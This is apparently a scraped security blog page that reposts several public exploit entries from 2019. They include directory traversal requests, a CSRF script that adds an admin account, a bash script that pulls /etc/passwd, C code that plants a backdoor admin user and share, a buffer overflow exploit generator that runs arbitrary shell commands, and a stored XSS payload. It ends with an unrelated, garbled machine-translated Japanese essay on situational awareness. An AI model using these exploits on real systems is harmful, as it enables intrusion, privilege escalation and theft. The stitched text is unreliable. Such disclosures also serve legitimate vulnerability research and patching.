# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A
# Date: 2019-11-15
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.lexmark.com/en_us.html
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# CVE : CVE-2019-16758
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.
Timeline:
Discovered on: 9/24/2019
Vendor Notified: 9/24/2019
Vendor Confirmed Receipt of Vulnerability: 9/24/2019
Follow up with Vendor: 9/25/2019
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
Vendor Confirmed Vulnerability is Valid: 9/26/2019
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019
Vendor Confirmed Signoff to Disclose: 9/27/2019
Final Email Sent: 9/27/2019
Public Disclosure: 11/15/2019
PoC:
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 848536
.
.
.
.[.P.e.r.f.l.i.b.].
.
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.
.
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.
.
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.
.
.L.a.s.t. .H.e.l.p.=.5.0.4.1.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 38710
..[.S.t.r.i.n.g.s.].
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 17463
# Copyright (c) 1993-2004 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name> <port number>/<protocol> [aliases...] [#<comment>]
#
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/udp users #Active users
daytime 13/tcp
daytime 13/udp
qotd 17/tcp quote #Quote of the day
qotd 17/udp quote #Quote of the day
chargen 19/tcp ttytst source #Character generator
chargen 19/udp ttytst source #Character generator
ftp-data 20/tcp #FTP, data
ftp 21/tcp #FTP. control
ssh 22/tcp #SSH Remote Login Protocol
telnet 23/tcp
smtp 25/tcp mail #Simple Mail Transfer Protocol
time 37/tcp timserver
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863595182
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019 -11-16
# Vendor Homepage: http://www.smarteyegroup.com/
# Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071
# Tested Version: 1.3.34
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s - iOS 13.2
##############################################################################################################################################
Summary: This app is specially built for P2P IP camera series. thanks to unique P2P connection technology that users are able to watch live
video on iPhone from any purchased IP camera by simply enter camera's ID and password; no complex IP or router settings. The app have a lot of
functions, such as local record video, set ftp params, set email, set motion alarm and so on.
##############################################################################################################################################
Steps to Produce the Crash:
1.- Run python code: iSmartViewPro.py
2.- Copy content to clipboard
3.- Open App "iSmartViewPro"
4.- Go to "Add Camera"
5.- go to "Add network cameras"
6.- Paste ClipBoard on "Camara DID"
7.- Paste ClipBoard on "Password"
8.- Next
9.- Crashed
##############################################################################################################################################
Python "iSmartViewPro" Code:
buffer = "\x41" * 257
print (buffer)
##############################################################################################################################################
# Title: Crystal Live HTTP Server 6.01 - Directory Traversal
# Date of found: 2019-11-17
# Author: Numan Türle
# Vendor Homepage: https://www.genivia.com/
# Version : Crystal Quality 6.01.x.x
# Software Link : https://www.crystalrs.com/crystal-quality-introduction/
POC
---------
GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-16
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
# Software Link: App Store for iOS devices
# GE Intelligent Platforms, Inc.
# Tested Version: 5.0.0.25920
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2
# Steps to Produce the Crash:
# 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py
# 2.- Copy content to clipboard
# 3.- Open "Open Proficy HMI-SCADA for iOS"
# 4.- Host List > "+"
# 5.- Add Host
# 6.- Address Type "IP Address"
# 7.- Host IP Address "192.168.1.1"
# 8.- User Name "l4m5"
# 9.- Paste ClipBoard on "Password"
# 10.- Add
# 11.- Connect
# 12.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 2500
print (buffer)
# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 2019–14345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10
# Description:
# Web application for management formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.
#Exploit
import requests
import sys
session = requests.Session()
http_proxy = “http://127.0.0.1:8080"
https_proxy = “https://127.0.0.1:8080"
proxyDict = {
“http” : http_proxy,
“https” : https_proxy
}
url = ‘http://localhost/tematres/vocab/login.php'
values = {‘id_correo_electronico’: ‘pablo@tematres.com’,
‘id_password’: ‘admin’,
‘task’:’login’}
r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[‘PHPSESSID’]
print (cookie)
host = sys.argv[1]
user = input(‘[+]User:’)
lastname = input(‘[+]lastname:’)
password = input(‘[+]Password:’)
password2 = input(‘[+]Confirm Password:’)
email = input(‘[+]Email:’)
if (password == password2):
#configure proxy burp
data = {
‘_nombre’:user,
‘_apellido’:lastname,
‘_correo_electronico’:email,
‘orga’:’bypassed’,
‘_clave’:password,
‘_confirmar_clave’:password2,
‘isAdmin’:1,
‘boton’:’Guardar’,
‘userTask’:’A’,
‘useactua’:’’
}
headers= {
‘Cookie’: ‘PHPSESSID=’+cookie
}
request = session.post(host+’/tematres/vocab/admin.php’, data=data,
headers=headers, proxies=proxyDict)
print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)
print(‘Status Code:’+ str(request.status_code))
else:
print (‘Passwords dont match!!!’)
# Exploit Title: Centova Cast 3.2.11 - Arbitrary File Download
# Date: 2019-11-17
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.11
# Tested on: Debian 9, CentOS 7
#!/bin/bash
if [ "$4" = "" ]
then
echo "Usage: $0 centovacast_url user password ftpaddress"
exit
fi
url=$1
user=$2
pass=$3
ftpaddress=$4
dwn() {
curl -s -k "$url/api.php?xm=server.copyfile&f=json&a\[username\]=$user&a\[password\]=$pass&a\[sourcefile\]=$1&a\[destfile\]=1.tmp"
wget -q "ftp://$user:$pass@$ftpaddress/1.tmp" -O $2
}
dwn /etc/passwd passwd
echo "
/etc/passwd:
"
cat passwd
# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-15
# Vendor Homepage : https://www.wondershare.net/
# Software Link: https://www.wondershare.net/mobilego/
# Tested on OS: Windows 7
# Proof of Concept (PoC):
==========================
C:\Program Files\Wondershare\MobileGo>icacls *.exe
adb.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
APKInstaller.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
BsSndRpt.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
DriverInstall.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
fastboot.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
FetchDriver.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
MGNotification.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
MobileGo.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
MobileGoService.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
unins000.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
URLReqService.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
WAFSetup.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
WsConverter.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
WsMediaInfo.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
#Exploit code(s):
=================
1) Compile below 'C' code name it as "MobileGo.exe"
#include<windows.h>
int main(void){
system("net user hacker abc123 /add");
system("net localgroup Administrators hacker /add");
system("net share SHARE_NAME=c:\ /grant:hacker,full");
WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
return 0;
}
2) Rename original "MobileGo.exe" to "~MobileGo.exe"
3) Place our malicious "MobileGo.exe" in the MobileGo directory
4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE.
Privilege Successful Escalation
# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
# Date: 2019-11-17
# Exploit Author: Akif Mohamed Ik
# Vendor Homepage: http://software.ncp-e.com/
# Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
# Version: 9.2x
# Tested on: Windows 7 SP1
# CVE : NA
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
ncprwsnt ncprwsnt
C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
Auto
rwsrsu rwsrsu
C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
Auto
ncpclcfg ncpclcfg
C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
Auto
NcpSec NcpSec
C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
Auto
C:\Users\ADMIN>sc qc ncprwsnt
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ncprwsnt
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ncprwsnt
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ADMIN>sc qc rwsrsu
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : rwsrsu
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : rwsrsu
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ADMIN>sc qc ncpclcfg
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : ncpclcfg
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ncpclcfg
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ADMIN>sc qc NcpSec
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : NcpSec
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NcpSec
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.
# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
# Author: chuyreds
# Discovery Date: 2019-11-16
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"/"IPC"
# 6.- Copy the content of the file into Username
# 7.- Click on Login Check
# 8.- Crashed
buffer = "\x41" * 520
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
# Discovery by: Diego Buztamante
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Click on "Enter Key"
# 5.- Paste ClipBoard on "Name: "
# 6.- OK
# 7.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("ipPulse_1.92.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)
# Date: 2019-10-20
# Exploit Author: Guy Levin
# https://blog.vastart.dev
# Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng
# Software Link: https://code.google.com/archive/p/nipper-ng/source/default/source
# Version: 0.11.10
# Tested on: Debian
# CVE : CVE-2019-17424
"""
Exploit generator created by Guy Levin (@va_start - twitter.com/va_start)
Vulnerability found by Guy Levin (@va_start - twitter.com/va_start)
For a detailed writeup of CVE-2019-17424 and the exploit building process, read my blog post
https://blog.vastart.dev/2019/10/stack-overflow-cve-2019-17424.html
may need to run nipper-ng with enviroment variable LD_BIND_NOW=1 on ceratin systems
"""
import sys
import struct
def pack_dword(i):
return struct.pack("<I", i)
def prepare_shell_command(shell_command):
return shell_command.replace(" ", "${IFS}")
def build_exploit(shell_command):
EXPLOIT_SKELETON = r"privilage exec level 1 " \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \
"aasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab " \
"kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca " \
"acdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaac " \
"uaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadma " \
"adnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaae " \
"faaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewa " \
"aexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaaf " \
"paafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaagha " \
"agiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaag " \
"zaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahra " \
"ahaaaataahuaahvaahwaahpaaaaaaazaaibaaicaaidaaieaaifaaigaaihaaiiaaijaai " \
"kaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajca " \
"ajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaaj"
WRITEABLE_BUFFER = 0x080FA001
CALL_TO_SYSTEM = 0x0804E870
COMMAND_BUFFER = 0x080FA015
OFFSET_FOR_WRITEABLE_BUFFER = 0x326
OFFSET_FOR_RETURN = 0x33a
OFFSET_FOR_COMMAND_BUFFER = 0x33e
OFFSET_FOR_SHELL_COMMAND = 0x2a
MAX_SHELL_COMMAND_CHARS = 48
target_values_at_offsets = {
WRITEABLE_BUFFER : OFFSET_FOR_WRITEABLE_BUFFER,
CALL_TO_SYSTEM : OFFSET_FOR_RETURN,
COMMAND_BUFFER : OFFSET_FOR_COMMAND_BUFFER
}
exploit = bytearray(EXPLOIT_SKELETON, "ascii")
# copy pointers
for target_value, target_offset in target_values_at_offsets.items():
target_value = pack_dword(target_value)
exploit[target_offset:target_offset+len(target_value)] = target_value
# copy payload
if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
raise ValueError("shell command is too big")
shell_command = prepare_shell_command(shell_command)
if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
raise ValueError("shell command is too big after replacing spaces")
# adding padding to end of shell command
for i, letter in enumerate(shell_command + "&&"):
exploit[OFFSET_FOR_SHELL_COMMAND+i] = ord(letter)
return exploit
def main():
if len(sys.argv) != 3:
print(f"usage: {sys.argv[0]} <shell command to execute> <output file>")
return 1
try:
payload = build_exploit(sys.argv[1])
except Exception as e:
print(f"error building exploit: {e}")
return 1
open(sys.argv[2], "wb").write(payload)
return 0 # success
if __name__ == '__main__':
main()
# Exploit Title: TemaTres 3.0 - 'value' Persistent Cross-site Scripting
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 2019–14343
# Reference: https://medium.com/@Pablo0xSantiago/cve-2019-14343-ebc120800053
# Tested on: Windows 10
#Description:
The parameter "value" its vulnerable to Stored Cross-site scripting..
#Payload: “><script>alert(“XSS”)<%2fscript>
POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0)
Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse
Upgrade-Insecure-Requests: 1
doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3edx6e1&alias=ACX&orden=2
lan
LANの概念は複雑さで繰り返されるべきである、と誰もがそれを理解しています。しかし、ここでは、LANは、LANの伝統的な概念、大都市圏ネットワーク、またはワイドエリアネットワークのLANを参照していませんが、組織のすべての資産とその外の世界とのコミュニケーションチャネルの収集で構成されるネットワークです。
状況認識
近年、状況認識の概念が非常に人気があります。私は多くの紹介、説教、製品ディスプレイを聞いてきました。状況認識とは何かの質問について考えているだけです。状況認識は、米海軍の周囲の環境、敵と認識+敵の状況システムを引用しました。実際、それはいわゆるイージスレベルの駆逐艦(アクティブな段階的アレイレーダーグループを備えた軍艦、敵から私への認識、ターゲット追跡、敵の状況判断などの戦場環境認識能力の完全なセット)です。シールド船と潜水艦護衛航空機の運送業者を使用して、世界を支配している米海軍の航空機の航空会社ストライキグループを形成しました。ネットワークは仮想の戦場であり、防衛と攻撃の基礎として機能するためには、エジスシステムの完全なセットも必要です。 IDとIPSを使用すると、敵をある程度識別できることがわかります(内部で悪いことをする人も敵と見なされます)が、毎日IDSとIPSシステムに何千ものアラームがあり、巨大なセキュリティチームが対処する必要があることがわかります。まず、巨大なセキュリティチームを設立することは容易ではありません。第二に、それはIDおよびIPS(技術的には誤報ではなく、ビジネス上の誤報)からの多数の誤報または近似の誤報です。Langweiには多くの人材と時間があり、第三に、IDとIPの過少報告には隠された危険を残す可能性があります。この問題を解決するために、業界はアラーム率を継続的に改善し、誤った警報率を下げ始めました。しかし、犯罪と防御の非対称性によって引き起こされる矛盾は解決されていないだけでなく、ますます深刻になっています。次に、SOC集約トラフィックとログ分析に発展しますが、これはさらに一歩ですが、それだけでは十分ではありません。大規模なデータ処理はビッグデータにますます依存しており、その効果も不十分です。
真の状況認識は抽象的であり、アラームや攻撃ログのラインに基づいていません。そして、攻撃チェーンの概念を確立する必要があります。攻撃チェーンは、攻撃を意味します。使用する方法、使用する方法、使用の数、攻撃の数、かかる回数、かかる時間、かかる時間、A攻撃Bが攻撃を行うことです。AからBまでの攻撃行動は攻撃チェーンです。さらに、ワームとトロイの木馬の処分には、攻撃源の概念の確立も必要です。スプレッドワンクリー。彼がどれほど多くの世代を広げても、Aは攻撃源であり、死ぬまで窒息するのに問題はありません。もちろん、ここに脅威の3つの要素におけるセキュリティ状況の取り扱いがあります(イベントの概念は、IDとIPのアラームイベントの概念と区別するために、ここではもはや使用されません)。資産と脆弱性(脆弱性ポイント)については、独自の情報の一部として状況認識システム全体にアクセスし、実際のリスク評価の3つの要素の統一された組み合わせを達成することもできます。攻撃チェーンと攻撃ソースの概念を確立することにより、組織内のセキュリティ運用について新たな理解ができます。この理論によれば、我々には被害者と潜在的な犠牲者(両方とも資産)、および潜在的な犠牲者ポイントの概念(ボイド)もいます。別の概念は、露出した領域の概念です。たとえば、aはwanncryを広げますが、aはbとc、bのみを通信することができ、cとdのどちらも通信することはできません(acl制限)(acl制限)はないため、露出した領域はb、c、およびDです。その後、Dには潜在的な被害点がありませんが、Cは潜在的な被害ポイントを持っています。 CとDはどちらも潜在的な犠牲者ですが、Cのみがヒットする可能性があります。上記の概念は少し複雑ですよね?実際、4つの次元に分類できます。最初の次元- 私たちの愛は、被害者、潜在的な被害者、潜在的な犠牲者のポイント、暴露地域、その他の情報を含む資産情報を含みます。 2番目の次元- 敵の状況:攻撃ソースと情報(企業や研究所が現在行っている多くの攻撃者の肖像画などが含まれています。組織内の敵の状況は、彼らが収集する情報に従って分類できます。攻撃方法と攻撃チェーンのアラーム、wanncryなど)。対応するさまざまなソリューションがあります。 4番目の次元- トレンド、私たちの状況、敵の状況、戦闘状況から将来の傾向を判断することは、企業のセキュリティ戦略の問題です。
私の愛:
技術属性(オペレーティングシステムバージョン、オープンポートとサービス、使用されるコンポーネントとバージョン)
ビジネス属性(ビジネスレベルの評価、資産所有者および部門、ビジネス責任者などを運ぶ)
ネットワーク属性(接続グラフ、アクセス特性)
セキュリティ属性(脆弱性ステータス、パッチステータス、ログインステータス、調査、検出)
敵の状況:
仮想ID(電子メール、ソーシャルアカウント、携帯電話番号、フォーラムID、および組織に属する)
基本設定(IPアドレス、ドメイン名、URL、CCアドレス)
攻撃機能(ツールセット、履歴攻撃行動、攻撃機能の負荷、サンプルハッシュを使用)
被害の範囲(業界の分配、フォーカス目標)
戦闘状況:
攻撃ソース(IPとID情報を記録し、敵の状況分析を詳細に確認してください)
被害者(IPと帰属情報を記録し、資産システムを詳細に表示)
ひどい(アラームの数、リスクの高いアラームの数、失われたかどうか)
傾向:
潜在的な犠牲者
潜在的な被害ポイント
露出したエリア
イントラネットセキュリティ操作
セキュリティ状況への応答
